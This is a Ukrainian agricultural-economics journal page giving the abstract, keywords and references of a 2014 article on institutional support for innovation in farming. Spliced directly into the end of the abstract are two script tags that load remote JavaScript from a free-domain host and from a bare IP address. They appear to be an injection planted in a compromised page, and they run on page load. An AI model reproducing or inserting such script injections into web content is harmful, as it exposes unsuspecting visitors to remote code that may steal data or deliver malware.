ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.837.001.76:338.431
Інституціональні проблеми розвитку аграрної сфери

Інституційне забезпечення інноваційної діяльності в аграрній сфері / Тивончук С.О., Костюк Р. В. // Економіка АПК. - 2014. - № 8 - С. 68

Розглянуто понятійні категорії інституційної економічної теорії, інституційну структуру (сукупність формальних і неформальних інститутів) інноваційної діяльності в аграрному виробництві, сучасний стан інституційного забезпечення інноваційної діяльності в аграрному виробництві України. Виявлено причини, які вплинули на формування неефективної структури інституцій науки й інноваційного розвитку галузі. Обґрунтувано необхідність переведення аграрного сектора економіки на інноваційну модель розвитку застосування теоретичних надбань інституціоналізму у формуванні інституційної системи інноваційної діяльності, сформульовані нерозривні зв’язки інституціонального забезпечення “Бізнес-системи управління інноваційними ресурсами” загального технологічного процесу виробництва наукомісткої продукції відповідно до закону взаємодії. Табл.: 1. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: бізнес–система, інновації, інституції, інноваційні ресурси, інтелектуальний продукт, конкуренція, понятійні категорії

Список використаних джерел

 1. Гайдай Т.В. Вплив сучасної інституціональної теорії на розвиток економічної науки / Т.В. Гайдай // Економічна теорія. – 2004. – № 2. – С. 92-107. 
 2. Державна служба статистики України / Наукова та інноваційна діяльність в Україні. – Стат. зб. ТОВ «Август Трейд». – К., 2010.
 3. Державний комітет статистики України / Наукова та інноваційна діяльність України. – Стат. зб. ДП «Інформаційно-аналітичне агентство». – К., 2009.
 4. Звіт про діяльність НААН України за 2006-2019 роки та 2012 рік. – К.: Аграрна наука, 2013.
 5. Інформаційно-аналітичний звіт про діяльність Державного агентства з питань науки, інновацій та інформатизації України у 2012 році. – Режим доступу: /http://www.dknii.gov.ua/?q=system/files/sites/.
 6. Іртищева І.О. Інституційне забезпечення формування інноваційних стратегічних структур агропродовольчої сфери. – Режим доступу: /http://www.obuch.com.ua/ekonomika/3085/index.html.
 7. Катигробова О.В. Сутнісна характеристика понять “інститут” та “інституція” в теорії інновацій www.sworld.com.ua/.../7510-description-of-un.
 8. Лендєл М. Нові інституційні механізми регіонального розвитку в Європі /М. Лендєл // Регіональні студії. — 2001. — Вип. 1. — С. 18—28.
 9. Лапатинский Ю. Институциональная аграрная матрица [Текст] / Ю. Лопатинский // Экономика Украины. – 2004. – № 4. – С. 64-72 .
 10. Попов В. Іституціональна складова трансформаційних процесів в економіці / В. Попов, О. Прутська // Вісник київського нац. торговельно-економічного ун-ту. – 1/2003. – №1. – С.13-18.
 11. Норт Д. Інституції, інституційна зміна та функціонування економіки / Д. Норт. – К.: Основи, 2000. – 198 с.
 12. Шпикуляк О.Г. Інституції аграрного ринку / О.Г. Шпикуляк. – К.: ННЦ ІАЕ, 2009. – 480 с.
 13. Institution, contracts and organisations : perspectives from new instution economics / ed. by . – Cheltenham : Edgar Elgar Publishing , 2000. – 460 p.
Читати статтю: 14_08_68-75.pdf
Читати переклад статті: 1408tyvonchuk_tyvonchuk_kostiuk.pdf